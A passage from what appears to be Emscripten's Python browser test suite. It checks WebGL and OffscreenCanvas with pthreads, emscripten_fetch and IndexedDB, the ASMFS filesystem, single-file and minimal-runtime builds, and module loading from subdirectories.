self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD=1']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS=1', '-lGL', '-s', 'GL_DEBUG=1']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
# Tests the feature that shell html page can preallocate the typed array and place it to Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
@no_wasm_backend('asm.js feature')
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'] + arg,
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'INITIAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_implicit_append(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest_exit(path_from_root('tests', 'unistd', 'close.c'), 0, args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest_exit(path_from_root('tests', 'unistd', 'access.c'), 0, args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest_exit(path_from_root('tests', 'unistd', 'unlink.c'), 0, args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG=1', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule']]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'MINIMAL_RUNTIME=1', '-s', 'USE_PTHREADS=1'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'pthread', 'hello_thread.c'), '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_test_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE=1'])
create_test_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE=1'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME=1', '-s', 'SINGLE_FILE=1', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE=1', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_test_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.compile_btest([path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
create_test_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_test_file('test.txt', 'hello from file')
self.compile_btest([path_from_root('tests', 'access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.compile_btest([path_from_root('tests', 'access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH=1', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_test_file('main.cpp', r'''
int main() {
REPORT_RESULT(0);
return 0;
}
''')
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-s', 'MODULARIZE=1'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE=1'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE=1'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_emscripten_set_immediate(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind'] + self.get_async_args())
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)
@no_wasm_backend('MINIMAL_RUNTIME not yet available in Wasm backend')
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME=1'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE=1'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE=1']]:
for modularize in [[], ['-s', 'MODULARIZE=1']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION=1', '--closure', '1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION=1', '--closure', '1']]:
self.btest(path_from_root('tests', 'small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME=1'])
@requires_threads
def test_offset_converter(self, *args):
try:
self.btest(path_from_root('tests', 'browser', 'test_offset_converter.c'), '1', args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
except Exception as e:
# dump the wasm file; this is meant to help debug #10539 on the bots
print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
raise e
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(path_from_root('tests', 'browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME=1'])
def test_wasm2js_fallback(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
self.compile_btest([path_from_root('tests', 'small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
